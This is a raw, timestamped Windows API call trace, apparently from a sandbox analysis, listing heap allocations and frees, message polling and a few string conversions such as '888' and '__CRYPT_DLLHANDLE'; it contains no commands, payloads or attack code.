[0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550e8 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.008] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fe8 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0231.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0231.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0231.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 